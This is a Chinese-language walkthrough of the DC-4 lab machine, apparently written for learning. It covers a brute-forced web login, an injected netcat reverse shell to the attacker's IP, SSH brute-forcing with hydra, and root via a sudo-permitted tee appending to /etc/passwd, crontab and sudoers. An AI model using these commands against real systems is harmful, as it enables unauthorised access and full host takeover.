DC-4
例行扫ip
和端口
root@kali:~# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:64:e1:4d, IPv4: 192.168.32.135
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
......
192.168.32.145 00:0c:29:b3:0a:ad VMware, Inc.
......
root@kali:~# nmap 192.168.32.145
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-15 02:22 EDT
Nmap scan report for 192.168.32.145
Host is up (0.00014s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:B3:0A:AD (VMware)
Nmap done: 1 IP address (1 host up) scanned in 13.23 seconds
哦豁,这次ssh+http
,又是猜解连接的套路?先访问80瞅瞅。
是一个Admin Information System Login
界面,上来就要账号密码,这谁顶得住啊,那就爆破吧,还能怎的。。。
爆破发现happy
是密码,发生了302跳转。进去就给了run command
的待遇,虽然限制三条命令,但这不抓包执行任意命令我都对不起它。发现可行,尝试反弹shell
:
反弹shell
radio=nc+-e+/bin/bash+192.168.32.135+9999&submit=Run
python -c 'import pty; pty.spawn("/bin/bash")'
成功反弹getshell
!
进入home
目录,得到有三个账号用户:charles
,jim
,sam
,分别进入文件夹查看后,仅在jim文件夹内看到了名为old-passwords.bak
,保存到本地搞成字典,去爆破ssh去(有点DC-2套路的意思)
将三个用户名和密码分别做成字典,利用hydra
进行爆破:
root@kali:~# hydra -L user.txt -P passwd.txt ssh://192.168.32.145
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-15 10:29:43
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 756 login tries (l:3/p:252), ~48 tries per task
[DATA] attacking ssh://192.168.32.145:22/
[STATUS] 179.00 tries/min, 179 tries in 00:01h, 580 to do in 00:04h, 16 active
[22][ssh] host: 192.168.32.145 login: jim password: jibril04
成功爆破出来了一个login:jim
,password:jibril04
,连接上去瞅瞅。
jim@dc-4:~$ ls
backups mbox test.sh
jim@dc-4:~$ cat mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
(envelope-from <root@dc-4>)
id 1hCiQe-0000gc-EC
for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO
This is a test.
三个文件除了mbox
刚看不了其他都看过了,打开后是封邮件,去/var/mail
再看看,果然有收获!
jim@dc-4:~$ cd /var/mail
jim@dc-4:/var/mail$ ls
jim
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O
Hi Jim,
I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.
Password is: ^xHhA&hvim0y
See ya,
Charles
然后得到了charles
的密码,登上去之后,据佬佬思路教学,一般都会先sudo -l
,查看用户权限,之前查看jim
的没有任何可用的权限,而charles
却有免密执行/usr/bin/teehee
的权限,果然跟老板关系好的人,权限都不一般。
charles@dc-4:~$ teehee --help
Usage: teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.
-a, --append append to the given FILEs, do not overwrite
-i, --ignore-interrupts ignore interrupt signals
-p diagnose errors writing to non pipes
--output-error[=MODE] set behavior on write error. See MODE below
--help display this help and exit
--version output version information and exit
MODE determines behavior with write errors on the outputs:
'warn' diagnose errors writing to any output
'warn-nopipe' diagnose errors writing to any output not a pipe
'exit' exit on error writing to any output
'exit-nopipe' exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.
GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'
查看了一下teehee
的使用也确实很amazing
啊,-a
在文件末尾追加,而非覆盖。
提权
方法一:直接添加root权限新用户提权
因为charles
具有teehee
的无密码执行权限且可以向文件写入内容,所以可以结合sudo添加新用户。
charles@dc-4:~$ echo "Tr0jAn::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
Tr0jAn::0:0:::/bin/bash
charles@dc-4:~$ su Tr0jAn
root@dc-4:/home/charles#
获得root
权限。该方法要注意同时只能有一个root
用户在线,若真正的root
用户在线,则无法免密提权!
参数解释
Tr0jAn::0:0:::/bin/bash
[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]
方法二:通过重要文件执行脚本提权
Linux
下相对重要的文件,无非就是定时任务文件(crontab
),sudoers
文件
一、定时任务文件
charles@dc-4:~$ echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab
* * * * * root chmod 4777 /bin/sh
charles@dc-4:~$ /bin/sh
# whoami
root
二、sudoers
文件
在kali
机器上看看sudoers
文件该咋写,仿造着在靶机上写一个
root@kali:~# cat /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults env_reset
Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
# Host alias specification
# User alias specification
# Cmnd alias specification
# User privilege specification
root ALL=(ALL:ALL) ALL
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL
# See sudoers(5) for more information on "#include" directives:
@includedir /etc/sudoers.d
看起来只需要写入charles ALL=(ALL:ALL) ALL
到/etc/sudoers
文件内即可:
charles@dc-4:~$ echo "charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers
charles ALL=(ALL:ALL) ALL
charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User charles may run the following commands on dc-4:
(root) NOPASSWD: /usr/bin/teehee
(ALL : ALL) ALL
charles@dc-4:~$ sudo /bin/bash
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for charles:
root@dc-4:/home/charles# whoami
root
成功写入后sudo -l
查看执行权限已经ALL了,然后执行所有命令,即sudo /bin/bash
,输入charles
的登录密码就ok了,最终getflag
!
root@dc-4:/# find / -name "*flag*"
......
/root/flag.txt
......
root@dc-4:/# cat /root/flag
cat: /root/flag: No such file or directory
root@dc-4:/# cat /root/flag.txt
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Congratulations!!!
Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.
这套靶机用到的知识点:
1.登录密码位弱口令;
2.存在任意代码执行漏洞;
3.邮件信息泄露;
4.低权限账号免密码执行高权限命令;
5.非法修改数据,进而提权。